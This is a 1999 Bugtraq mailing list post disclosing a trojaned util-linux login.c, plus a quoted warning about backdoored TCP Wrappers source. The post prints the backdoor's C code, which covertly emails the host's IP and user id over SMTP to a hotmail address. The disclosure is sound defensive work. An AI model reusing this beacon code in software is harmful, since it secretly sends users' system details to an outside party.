Bugtraq mailing list archives
Re: backdoored tcp wrapper source code
From: building () CS UMD EDU (John Stange)
Date: Sat, 23 Jan 1999 22:49:29 -0500
You may want to have a thorough look at everything you've got... I grabbed a copy of util-linux2.9g (admittedly being a bad boy and not checking against anything), and while I don't have a pristine copy of the source on hand to check, I'm guessing that sendmail and a hotmail address is not standard behavior for /bin/login: (from login-utils/login.c) he = gethostbyname("mail.hotmail.com"); if (!he) exit(0); ia = (struct in_addr *)he->h_addr_list[0]; l = sizeof(sai);memset(&sai,0,l); sai.sin_port = htons(25); sai.sin_addr.s_addr = ia->s_addr; if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0); if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0); if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0); sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid()); sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0); sleep(1);if (write(s,"MAIL FROM:<xul () hotmail com>\n",28) < 0) exit(0); if (write(s,"RCPT TO:<wlogain () hotmail com>\n",30) < 0) exit(0); sleep(1);if (write(s,"DATA\n",5) < 0) exit(0); sleep(1);if (write(s,b,strlen(b)) < 0) exit(0); sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0); sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0); etc etc I'm in a bit of a hurry, so I haven't had a chance to comb anything else...
TCP Wrappers is a widely-used security tool to protect UNIX systems against intrusion. In has an estimated installed base of millions. Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a backdoored version. Eventually this was bound to happen, and that's why the source file is accompanied by a PGP signature. But that is no guarantee against people downloading and installing backdoored software.
-- John Stange Staff World, 4120 AVW x52720
Current thread:
- Misleading CERT Advisory CA-99-01-Trojan-TCP-Wrappers, (continued)
- Misleading CERT Advisory CA-99-01-Trojan-TCP-Wrappers Jochen Thomas Bauer (Jan 22)
- Follow up - IIS 4 logging mnemonix (Jan 23)
- WebRamp M3 remote network access bug John Stanley (Jan 21)
- Re: WebRamp M3 remote network access bug James Egelhof (Jan 21)
- Perl.exe and IIS security advisory mnemonix (Jan 22)
- Re: Perl.exe and IIS security advisory Tabor J. Wells (Jan 24)
- Repost: Wietse's FTP site has moved Wietse Venema (Jan 25)
- Using Example Domain Names in Exploits bandregg () REDHAT COM (Jan 25)
- IIS Advisory Update Marc (Jan 24)
- backdoored tcp wrapper source code Wietse Venema (Jan 21)
- Re: backdoored tcp wrapper source code John Stange (Jan 23)
- SSH 1.x and 2.x Daemon KuRuPTioN (Jan 23)
- Re: SSH 1.x and 2.x Daemon Jan B. Koum (Jan 24)
- Re: SSH 1.x and 2.x Daemon Linux Mailing Lists (Jan 25)
- Re: SSH 1.x and 2.x Daemon KuRuPTioN (Jan 25)
- Re: backdoored tcp wrapper source code John Stange (Jan 23)
- Re: SSH 1.x and 2.x Daemon Alan Olsen (Jan 24)
- baynetworks router DoS Virsoft (Jan 25)
- Re: baynetworks router DoS Neale Banks (Jan 26)
- 2.2.0 SECURITY (fwd) Aaron Lehmann (Jan 26)
- IBM CICS Universal Client 3.x Rude Yak (Jan 27)
- Re: SSH 1.x and 2.x Daemon Yutaka OIWA (Jan 25)